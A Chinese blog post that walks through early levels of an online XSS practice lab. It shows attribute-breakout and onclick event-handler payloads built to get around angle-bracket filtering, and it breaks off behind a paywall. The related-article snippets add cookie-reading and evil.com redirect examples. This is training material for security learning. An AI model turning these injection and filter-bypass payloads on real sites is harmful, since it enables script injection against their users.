web安全—XSS攻击(二)

最新推荐文章于 2024-06-23 14:17:48 发布
原创 最新推荐文章于 2024-06-23 14:17:48 发布 · 588 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#XSS学习

本文通过在线XSS平台进行实战演练,详细介绍了如何利用不同payload逐关突破,涉及事件触发、字符过滤与绕过、HTML实体转换等技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

练习了DVWA靶场中的XSS了解了一些原理和攻击方式,接下来就用在线XSS平台开始实战一番。

在线XSS平台地址
在这里插入图片描述
第一关肯定不会太难,就用最常用的攻击语句试试。

<script>alert(/hacker/)</script>

在这里插入图片描述
第二关
在这里插入图片描述
就先把这个最简单的攻击语句放上去看看

<script>alert(/hacker/)</script>

没有出现弹窗,看下页面源代码。

<input name=keyword  value="<script>alert(/hacker/)</script>">
<input type=submit name=submit value="搜索"/>

观察代码,要想我们的语句起作用,就需要把前面的<input>标签给闭合掉。
那就输入这样的语句:
payload:

"><script>alert(/hacker/)</script>

在这里插入图片描述
第三关
在这里插入图片描述
还是那个套路,放上最常用的语句试试
没有成功,看看页面源代码

<input name=keyword  value='&lt;script&gt;alert(/hacker/)&lt;/script&gt;'>
<input type=submit name=submit value=搜索 />

发现输入的<和>被转义了
既然过滤了<和>,那就换一种攻击方式,用onclick 事件,onclick 事件会在元素被点击时发生。onclick 事件直接包含在<>内,并且可以被执行。再观察页面源代码,是单引号,那就在前面加'把value给闭合掉。
payload:

'οnclick='javascript:alert(/hacker/)'

输入之后,再点击一下输入框
在这里插入图片描述
第四关
在这里插入图片描述
先拿一个攻击语句测试下,再看看页面源代码。

<input name=keyword  value="scriptalert(/hacker/)/script">
<input type=submit name=submit value=搜索 />

观察到<和>直接被过滤掉了
那就用onclick 事件,这里是双引号,那就在前面输入",把value给闭合掉。
payload:

"οnclick="javascript:alert(/hacker/)"

在这里插入图片描述
第五关
在这里插入图片描述
还是那个套路,先输入常用的看看,没有弹窗,看看页面源代码。

<input name=keyword  value=""o_nclick="javascript:alert(/xss/)"">
<input type=submit name
最低0.47元/天 解锁文章

200万优质内容无限畅学
XSS漏洞—XSS平台搭建与打cookie
goldfish8848的博客
06-21 2786
6. **避免内联事件**:避免在HTML中使用内联JavaScript事件处理器,如 `onLoad="onload('{{data}}')"` 或 `onClick="go('{{action}}')"`,因为这些容易受到XSS攻击。7. **避免拼接HTML**:前端采用拼接HTML的方法比较危险,如果可能,使用 `createElement`、`setAttribute` 等方法实现,或者采用成熟的渲染框架,如Vue或React。攻击者可能会尝试使用不同的字符编码或分隔符来绕过简单的输入验证。
Web安全XSS攻击与防御小结
02-23
攻击者对含有漏洞的服务器发起XSS攻击(注入JS代码)。诱使受害者打开受到攻击的服务器URL。受害者在Web浏览器中打开URL,恶意脚本执行。(1)反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,...
Input XSS最新漏洞及利用
06-12
我们知道,如果要使XSS能够实现,我们的代码必须通过某种方式嵌入到对方的网页中。像注入漏洞的“’”、“and 1=1”和“and 1=2”一样,Input XSS也有自己的漏洞检测字符串,它们就是“<>”、“<iframe>”和 “<script>alert(/xss/)</script>”。如果当你在Input框中输入“<>”,并在新 页面的源代码中找到这对标签的话,那么基本上就说明它存在Input XSS漏洞;而“<iframe>”则是它的可视化检测方式;如果“<script>alert(/xss/)< /script>”能够实现,则证明该页面可以实行脚本攻击,但是否可以被插入脚本,在本次的测试里亦不是非常重要,后面你将会知道。
【基本功】 前端安全系列之一:如何防止XSS攻击
美团技术团队
09-27 3215
总第287篇2018年 第79篇当当当当,我是美团技术团队的程序员鼓励师美美~“基本功”专栏又来新文章了,这次是一个系列,一起来学习前端安全的那些事。我们将不断梳理常见的...
收集了一些XSS攻击平台
gdhjgfr的博客
11-04 1925
分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.youkuaiyun.com/jiangjunshow也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Attack APIB
XSS攻击方法
blrk
05-11 1264
首先通过构造XSS代码的方法来构造XSS脚本,用以测试发现漏洞,然后利用以下方法实现攻击。 (1)Redirection - 重定向 重定向被攻击者,如document.location=http://www.evil.com (2)Clickjacking - 点击劫持 可用来钓鱼,如通过onclick触发 (3)URL Spoofing - URL欺骗 常用于钓鱼,页面被劫持并且信
web安全XSS攻击demo
04-18
本篇将深入探讨XSS攻击的概念、类型、危害以及防范措施,并结合提供的"web安全XSS攻击demo"进行详细讲解。 XSS攻击是通过注入恶意脚本到Web页面中,使得当其他用户浏览这些页面时,脚本被执行,从而可以盗取用户...
Web安全XSS-Labs靶场实战:从新手到高手的跨站脚本攻击与防御深度解析
最新发布
04-17
最后,强调了 XSS 攻击的危害性和防御的重要性,呼吁开发者和网站管理者重视 Web 安全,采取有效措施防范 XSS 漏洞。 适合人群:网络安全领域的初学者、开发人员、安全研究人员及爱好者。 使用场景及目标:①帮助...
web安全XSS攻击及防御pdf
08-25
### Web安全XSS攻击及防御 #### 一、XSS基本原理 ##### 1.1 什么是XSS 跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的Web应用程序安全漏洞,其形成原因主要是由于Web应用程序对用户输入的数据过滤不...
XSS数据接收网站——XSS在线平台
p36273的博客
06-17 8954
平台的网址是:链接:XSS在线平台。
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
xss攻击()
wwwwxiaobai的博客
06-11 400
xss攻击 前言: xss也是web安全中的一种常见的攻击方式,想要学习,就先要了解是什么。 xss攻击的定义: XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 只是看概念是没意思的,要想...
XSS攻击原理
一只猿的自我修养
04-30 316
XSS攻击的全称是跨站脚本攻击(Cross Site Scripting),为不跟层叠样式表CSS(Cascading Style Sheets)的缩写混淆,故将跨站脚本攻击缩写为XSS,它是Web应用程序中最常见到的攻击手段之一。跨站脚本攻击指的是攻击者在网页中嵌入恶意脚本程序,当用户打开该网页时,脚本程序便开始在客户端的浏览器上执行,以盗取客户端cookie、用户名密码,下载执行病毒木马程序,甚至是获取客户端admin权限等。 示例: 假设页面上有个表单元素,名称为username,用于展示和修
小迪安全--xss跨站脚本攻击
wcwdnmdnmd的博客
08-24 750
xss跨站脚本攻击xss原理 xss原理 它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实 施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨大的,是web安全的头号大敌。 ...
xss 利用总结
weixin_45427650的博客
02-29 1032
参考https://www.cnblogs.com/bmjoker/p/9446472.html 过滤函数:htmlspecialchars() &:转换为&amp; ":转换为&quot; ':转换为成为 ’ <:转换为&lt; >:转换为&gt; 如果“<”被过滤 可以使用 payload : " onclick=alert(1)&g...
xss-labs(Less1-Less10)
qq_46874275的博客
03-13 345
Less 1
XSS漏洞实验
goldfish8848的博客
06-23 2025
本篇为xss漏洞实验练习,练习网址来源于网络。
XSS 跨站测试代码大全2
LIVE
11-07 1399
0x01 XSS介绍 1. XSS分类 (1) 反射型XSS(2)存储型XSS(3)Dom型XSS(4) 通用型XSS(全称Universal Cross-Site Scripting,翻译过来就是通用型XSS 简称UXSS) (5) 突变型XSS ( 介绍: mXS()突变 XSS) 是当不可信数据在 DOM 的 innerHTML 属性的上下文被处理并通过浏览器发生突变,...
XSS跨站测试代码大全
xysoul的专栏
04-13 6349
'>alert(document.cookie)   ='>alert(document.cookie)   alert(document.cookie)   alert(vulnerable)   %3Cscript%3Ealert('XSS')%3C/script%3E   alert('XSS')      %0a%0aalert(\"Vulnerable\").jsp
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值